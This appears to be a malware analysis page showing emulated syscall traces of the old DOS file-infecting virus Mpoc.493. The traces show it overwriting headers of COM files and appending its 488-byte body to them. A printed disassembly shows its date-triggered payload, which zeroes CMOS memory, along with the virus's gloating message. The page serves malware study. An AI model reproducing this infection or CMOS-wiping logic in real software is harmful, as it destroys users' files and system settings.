Sample viewer

vx.netlux.org/Virus.DOS.Mpoc.493

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:47:18.713341048Z 26 PC: 12a61 | Set disk transfer address
2018-12-17T22:47:18.715078132Z 78 PC: 12ab9 | Find first file
2018-12-17T22:47:18.723322432Z 67 PC: 12ac9 | Get or set file attributes
2018-12-17T22:47:18.744262434Z 61 PC: 12ad2 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:47:18.751653174Z 63 PC: 12ade | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:47:18.759471076Z 66 PC: 12b04 | Move file pointer
2018-12-17T22:47:18.761261703Z 64 PC: 12b0f | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:47:18.764498288Z 2 PC: 12b16 | Character output (Char = '00')
2018-12-17T22:47:18.767817594Z 64 PC: 12b21 | Write file or device (Write 488 bytes on handle 5)
2018-12-17T22:47:18.771551216Z 87 PC: 12b30 | Get or set file date and time
2018-12-17T22:47:18.773078623Z 67 PC: 12b3e | Get or set file attributes
2018-12-17T22:47:18.779583857Z 79 PC: 12ab9 | Find next file
2018-12-17T22:47:18.79093798Z 67 PC: 12ac9 | Get or set file attributes
2018-12-17T22:47:18.796452655Z 61 PC: 12ad2 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:47:18.804014702Z 63 PC: 12ade | Read file or device (Read 5 bytes on handle 6)
2018-12-17T22:47:18.812245353Z 66 PC: 12b04 | Move file pointer
2018-12-17T22:47:18.820344963Z 64 PC: 12b0f | Write file or device (Write 5 bytes on handle 6)
2018-12-17T22:47:18.823827033Z 2 PC: 12b16 | Character output (Char = '00')
2018-12-17T22:47:18.827568239Z 64 PC: 12b21 | Write file or device (Write 488 bytes on handle 6)
2018-12-17T22:47:18.830595797Z 87 PC: 12b30 | Get or set file date and time
2018-12-17T22:47:18.832426344Z 67 PC: 12b3e | Get or set file attributes
2018-12-17T22:47:18.839544819Z 79 PC: 12ab9 | Find next file
2018-12-17T22:47:18.842502902Z 67 PC: 12ac9 | Get or set file attributes
2018-12-17T22:47:18.847710371Z 61 PC: 12ad2 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:47:18.855474602Z 63 PC: 12ade | Read file or device (Read 5 bytes on handle 7)
2018-12-17T22:47:18.862900975Z 66 PC: 12b04 | Move file pointer
2018-12-17T22:47:18.864531571Z 64 PC: 12b0f | Write file or device (Write 5 bytes on handle 7)
2018-12-17T22:47:18.877832228Z 2 PC: 12b16 | Character output (Char = '00')
2018-12-17T22:47:18.88264958Z 64 PC: 12b21 | Write file or device (Write 488 bytes on handle 7)
2018-12-17T22:47:18.88595298Z 87 PC: 12b30 | Get or set file date and time
2018-12-17T22:47:18.887924091Z 67 PC: 12b3e | Get or set file attributes
2018-12-17T22:47:18.894007308Z 79 PC: 12ab9 | Find next file
2018-12-17T22:47:18.897320644Z 67 PC: 12ac9 | Get or set file attributes
2018-12-17T22:47:18.904222673Z 61 PC: 12ad2 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:47:18.913158179Z 63 PC: 12ade | Read file or device (Read 5 bytes on handle 8)
2018-12-17T22:47:18.920986111Z 66 PC: 12b04 | Move file pointer
2018-12-17T22:47:18.92323474Z 64 PC: 12b0f | Write file or device (Write 5 bytes on handle 8)
2018-12-17T22:47:18.928078578Z 2 PC: 12b16 | Character output (Char = '00')
2018-12-17T22:47:18.931640419Z 64 PC: 12b21 | Write file or device (Write 488 bytes on handle 8)
2018-12-17T22:47:18.93542292Z 87 PC: 12b30 | Get or set file date and time
2018-12-17T22:47:18.938533922Z 67 PC: 12b3e | Get or set file attributes
2018-12-17T22:47:18.944730777Z 79 PC: 12ab9 | Find next file
2018-12-17T22:47:18.948451069Z 67 PC: 12ac9 | Get or set file attributes
2018-12-17T22:47:18.955761259Z 61 PC: 12ad2 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:47:18.963957307Z 63 PC: 12ade | Read file or device (Read 5 bytes on handle 9)
2018-12-17T22:47:18.972209159Z 66 PC: 12b04 | Move file pointer
2018-12-17T22:47:18.974156666Z 64 PC: 12b0f | Write file or device (Write 5 bytes on handle 9)
2018-12-17T22:47:18.979308583Z 2 PC: 12b16 | Character output (Char = '00')
2018-12-17T22:47:18.982056728Z 64 PC: 12b21 | Write file or device (Write 488 bytes on handle 9)
2018-12-17T22:47:18.986030573Z 87 PC: 12b30 | Get or set file date and time
2018-12-17T22:47:18.98896669Z 67 PC: 12b3e | Get or set file attributes
2018-12-17T22:47:18.995640199Z 79 PC: 12ab9 | Find next file
2018-12-17T22:47:18.999356607Z 67 PC: 12ac9 | Get or set file attributes
2018-12-17T22:47:19.00586805Z 61 PC: 12ad2 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:47:19.013772276Z 63 PC: 12ade | Read file or device (Read 5 bytes on handle 10)
2018-12-17T22:47:19.0215003Z 66 PC: 12b04 | Move file pointer
2018-12-17T22:47:19.023853574Z 64 PC: 12b0f | Write file or device (Write 5 bytes on handle 10)
2018-12-17T22:47:19.02726741Z 2 PC: 12b16 | Character output (Char = '00')
2018-12-17T22:47:19.030007672Z 64 PC: 12b21 | Write file or device (Write 488 bytes on handle 10)
2018-12-17T22:47:19.034022338Z 87 PC: 12b30 | Get or set file date and time
2018-12-17T22:47:19.036119279Z 67 PC: 12b3e | Get or set file attributes
2018-12-17T22:47:19.041670684Z 79 PC: 12ab9 | Find next file
2018-12-17T22:47:19.045797653Z 67 PC: 12ac9 | Get or set file attributes
2018-12-17T22:47:19.05238994Z 61 PC: 12ad2 | Open file (Filename = 'PAH.COM')
2018-12-17T22:47:19.059688775Z 63 PC: 12ade | Read file or device (Read 5 bytes on handle 11)
2018-12-17T22:47:19.067526265Z 66 PC: 12b04 | Move file pointer
2018-12-17T22:47:19.070484754Z 64 PC: 12b0f | Write file or device (Write 5 bytes on handle 11)
2018-12-17T22:47:19.073815481Z 2 PC: 12b16 | Character output (Char = '00')
2018-12-17T22:47:19.076539918Z 64 PC: 12b21 | Write file or device (Write 488 bytes on handle 11)
2018-12-17T22:47:19.081291383Z 87 PC: 12b30 | Get or set file date and time
2018-12-17T22:47:19.083374569Z 67 PC: 12b3e | Get or set file attributes
2018-12-17T22:47:19.089191867Z 79 PC: 12ab9 | Find next file
2018-12-17T22:47:19.093313698Z 67 PC: 12ac9 | Get or set file attributes
2018-12-17T22:47:19.098967939Z 61 PC: 12ad2 | Open file (Filename = 'TEST.COM')
2018-12-17T22:47:19.106622121Z 63 PC: 12ade | Read file or device (Read 5 bytes on handle 12)
2018-12-17T22:47:19.111008511Z 79 PC: 12ab9 | Find next file
2018-12-17T22:47:19.114397142Z 42 PC: 12b4b | Get date 0x12b4b: cmp dx, 0x607
0x12b4f: je 0x12b53
0x12b51: jmp 0x12b6b
0x12b53: mov ah, 9
0x12b55: lea dx, word ptr [bp + 0x230]
0x12b59: int 0x21
0x12b5b: mov cx, 0x40
0x12b5e: mov ax, cx
0x12b60: dec ax
0x12b61: or al, 0x80
0x12b63: out 0x70, al
0x12b65: xor ax, ax
0x12b67: out 0x71, al
0x12b69: loop 0x12b5e
0x12b6b: mov si, 0x100
0x12b6e: jmp si
0x12b70: dec bp
0x12b71: jae 0x12be7
0x12b74: popaw
0x12b75: and byte ptr gs:[edx + 0x65], dh

{"DateBased":true,"Day":7,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9173,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:37.750931531Z 26 PC: 12a61 | Set disk transfer address
2018-12-25T12:22:37.752204081Z 78 PC: 12ab9 | Find first file
2018-12-25T12:22:37.758574266Z 67 PC: 12ac9 | Get or set file attributes
2018-12-25T12:22:38.13987002Z 61 PC: 12ad2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:38.147084647Z 63 PC: 12ade | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:22:38.153267603Z 66 PC: 12b04 | Move file pointer
2018-12-25T12:22:38.154510089Z 64 PC: 12b0f | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:22:38.157438303Z 2 PC: 12b16 | Character output (Char = '00')
2018-12-25T12:22:38.160736555Z 64 PC: 12b21 | Write file or device (Write 488 bytes on handle 5)
2018-12-25T12:22:38.164047511Z 87 PC: 12b30 | Get or set file date and time
2018-12-25T12:22:38.165855491Z 67 PC: 12b3e | Get or set file attributes
2018-12-25T12:22:38.171870955Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.175453125Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.180359354Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.18741916Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.193700292Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.195303816Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.198334944Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.200815155Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.203772075Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.206066069Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.211446977Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.214079933Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.221431254Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.227682198Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.233741128Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.239285632Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.24189452Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.244113643Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.248244386Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.249713988Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.254331639Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.257166361Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.26168507Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.267898774Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.27422629Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.275620312Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.27804056Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.28058963Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.283006268Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.284314596Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.290295885Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.292839347Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.295795722Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.302214585Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.308804982Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.310016124Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.313491623Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.3155871Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.318098574Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.319550504Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.324615123Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.327185972Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.33190631Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.336494922Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.342398821Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.343715145Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.346687967Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.3486112Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.351153628Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.352582313Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.357182648Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.35947901Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.364189912Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.37058704Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.377115726Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.378453671Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.380748762Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.382493453Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.384904739Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.386055314Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.390387736Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.392780083Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.396953496Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.4028976Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.405803558Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.407293772Z 42 PC: 12b4b | Get date 0x12b4b: cmp dx, 0x607
0x12b4f: je 0x12b53
0x12b51: jmp 0x12b6b
0x12b53: mov ah, 9
0x12b55: lea dx, word ptr [bp + 0x230]
0x12b59: int 0x21
0x12b5b: mov cx, 0x40
0x12b5e: mov ax, cx
0x12b60: dec ax
0x12b61: or al, 0x80
0x12b63: out 0x70, al
0x12b65: xor ax, ax
0x12b67: out 0x71, al
0x12b69: loop 0x12b5e
0x12b6b: mov si, 0x100
0x12b6e: jmp si
0x12b70: dec bp
0x12b71: jae 0x12be7
0x12b74: popaw
0x12b75: and byte ptr gs:[edx + 0x65], dh
2018-12-25T12:22:38.408597985Z 9 PC: 12b5b | Display string (String= 'Message recieved from M-POC Generation 2: I�ve killed your C-MOS settings. HAHAHA!!! The BugHunter is outta here !!! :)')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9173,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:38.069307938Z 26 PC: 12a61 | Set disk transfer address
2018-12-25T12:22:38.071205521Z 78 PC: 12ab9 | Find first file
2018-12-25T12:22:38.076961738Z 67 PC: 12ac9 | Get or set file attributes
2018-12-25T12:22:38.137864301Z 61 PC: 12ad2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:38.144925515Z 63 PC: 12ade | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:22:38.15146773Z 66 PC: 12b04 | Move file pointer
2018-12-25T12:22:38.152913566Z 64 PC: 12b0f | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:22:38.156821576Z 2 PC: 12b16 | Character output (Char = '00')
2018-12-25T12:22:38.158886035Z 64 PC: 12b21 | Write file or device (Write 488 bytes on handle 5)
2018-12-25T12:22:38.161485243Z 87 PC: 12b30 | Get or set file date and time
2018-12-25T12:22:38.1628324Z 67 PC: 12b3e | Get or set file attributes
2018-12-25T12:22:38.168321263Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.170941182Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.175878326Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.182733611Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.189387785Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.190678502Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.193627204Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.195619543Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.19833522Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.200233491Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.205099935Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.209959279Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.213819333Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.218610991Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.236892944Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.238910866Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.241560517Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.243543366Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.24702738Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.24870176Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.254108927Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.260911399Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.265671637Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.271879095Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.278434911Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.281005311Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.283457908Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.28543251Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.288179324Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.289770378Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.295788486Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.298422323Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.302944045Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.309552755Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.317037596Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.31829672Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.321096607Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.324787251Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.327237909Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.328626611Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.334007056Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.336459363Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.340869491Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.347750317Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.353791548Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.355173355Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.358254704Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.360363553Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.362827559Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.365226639Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.368786552Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.371335122Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.376653633Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.383141737Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.390273611Z 66 PC: 12b04 | Move file pointer (See above)
2018-12-25T12:22:38.392345279Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T12:22:38.395514654Z 2 PC: 12b16 | Character output (See above)
2018-12-25T12:22:38.397572409Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:22:38.400938454Z 87 PC: 12b30 | Get or set file date and time (See above)
2018-12-25T12:22:38.402409358Z 67 PC: 12b3e | Get or set file attributes (See above)
2018-12-25T12:22:38.407459452Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.410779666Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T12:22:38.415408573Z 61 PC: 12ad2 | Open file (See above)
2018-12-25T12:22:38.422226721Z 63 PC: 12ade | Read file or device (See above)
2018-12-25T12:22:38.426074867Z 79 PC: 12ab9 | Find next file (See above)
2018-12-25T12:22:38.428328794Z 42 PC: 12b4b | Get date 0x12b4b: cmp dx, 0x607
0x12b4f: je 0x12b53
0x12b51: jmp 0x12b6b
0x12b53: mov ah, 9
0x12b55: lea dx, word ptr [bp + 0x230]
0x12b59: int 0x21
0x12b5b: mov cx, 0x40
0x12b5e: mov ax, cx
0x12b60: dec ax
0x12b61: or al, 0x80
0x12b63: out 0x70, al
0x12b65: xor ax, ax
0x12b67: out 0x71, al
0x12b69: loop 0x12b5e
0x12b6b: mov si, 0x100
0x12b6e: jmp si
0x12b70: dec bp
0x12b71: jae 0x12be7
0x12b74: popaw
0x12b75: and byte ptr gs:[edx + 0x65], dh